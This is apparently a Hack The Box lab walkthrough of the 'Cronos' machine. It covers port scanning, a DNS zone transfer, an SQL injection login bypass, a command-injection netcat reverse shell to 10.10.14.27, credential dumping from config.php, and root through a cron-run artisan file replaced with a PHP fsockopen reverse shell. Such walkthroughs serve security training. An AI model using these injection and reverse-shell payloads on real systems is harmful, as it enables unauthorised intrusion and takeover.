Cronos

Port Scanning

naabu -host cronos.htb

                  __
  ___  ___  ___ _/ /  __ __
 / _ \/ _ \/ _ \/ _ \/ // /
/_//_/\_,_/\_,_/_.__/\_,_/ v2.0.5

		projectdiscovery.io

Use with caution. You are responsible for your actions
Developers assume no liability and are not responsible for any misuse or damage.
[INF] Running CONNECT scan with non root privileges
[INF] Found 3 ports on host cronos.htb (10.10.10.13)
cronos.htb:53
cronos.htb:80
cronos.htb:22

Open ports

• port 53 DNS

• port 80 http default apache page

• port 22 SSH

Checking for DNS Zone Transfer

dig axfr cronos.htb @10.10.10.13

; <<>> DiG 9.18.8-1-Debian <<>> axfr cronos.htb @10.10.10.13
;; global options: +cmd
cronos.htb.		604800	IN	SOA	cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.		604800	IN	NS	ns1.cronos.htb.
cronos.htb.		604800	IN	A	10.10.10.13
admin.cronos.htb.	604800	IN	A	10.10.10.13
ns1.cronos.htb.		604800	IN	A	10.10.10.13
www.cronos.htb.		604800	IN	A	10.10.10.13
cronos.htb.		604800	IN	SOA	cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 35 msec
;; SERVER: 10.10.10.13#53(10.10.10.13) (TCP)
;; WHEN: Fri Aug 25 02:35:57 +08 2023
;; XFR size: 7 records (messages 1, bytes 203)

New subdomain

admin.cronos.htb

echo admin.cronos.htb 10.10.10.13 >> /etc/hosts

Foothold

Webpage login page vulnerable to SQL injection

admin.cronos.htb

'OR 1 OR'

After successfully login , command execute is found to be allowed

8.8.8.8;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.27 4567 >/tmp/f

• input ; and reverse shell follows after that

Config file is presented in current directory

cat config.php
<?php
   define('DB_SERVER', 'localhost');
   define('DB_USERNAME', 'admin');
   define('DB_PASSWORD', 'kEjdbRigfBHUREiNSDs');
   define('DB_DATABASE', 'admin');
   $db = mysqli_connect(DB_SERVER,DB_USERNAME,DB_PASSWORD,DB_DATABASE);
?>

looking for user with home

cat /etc/passwd | grep home
syslog:x:104:108::/home/syslog:/bin/false
noulis:x:1000:1000:Noulis Panoulis,,,:/home/noulis:/bin/bash

looking at the database

mysql -u admin -p admin

select * from users;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | admin    | 4f5fffa7b2340178a716e3832451e058 |
+----+----------+----------------------------------+

ssh attempt unsuccessful

ssh noulis@cronos.htb

The authenticity of host 'cronos.htb (10.10.10.13)' can't be established.
ED25519 key fingerprint is SHA256:0QcWAcBsE48rtLkfUydRF2HmC1YqGFnb3VuTC0hLSK0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'cronos.htb' (ED25519) to the list of known hosts.
noulis@cronos.htb's password: 
Permission denied, please try again.
noulis@cronos.htb's password: 

Priv Esc

cronjobs as found to be run as root

cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

* * * * *	root	php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

artisan file is a php file and we have read and write access

-rwxr-xr-x  1 www-data www-data    1646 Apr  9  2017 artisan

www-data@cronos:/var/www/laravel$ cat artisan
#!/usr/bin/env php
<?php

/*
|--------------------------------------------------------------------------
| Register The Auto Loader
|--------------------------------------------------------------------------
|
| Composer provides a convenient, automatically generated class loader
| for our application. We just need to utilize it! We'll require it
| into the script here so that we do not have to worry about the
| loading of any our classes "manually". Feels great to relax.
|
*/

modified version

<?php
$sock=fsockopen("10.10.14.27",1234);exec("sh <&3 >&3 2>&3");
/*

Open listener and wait for connection for root shell

nc -nlvp 1234

listening on [any] 1234 ...
connect to [10.10.14.27] from (UNKNOWN) [10.10.10.13] 54116

ls
root.txt
whoami
root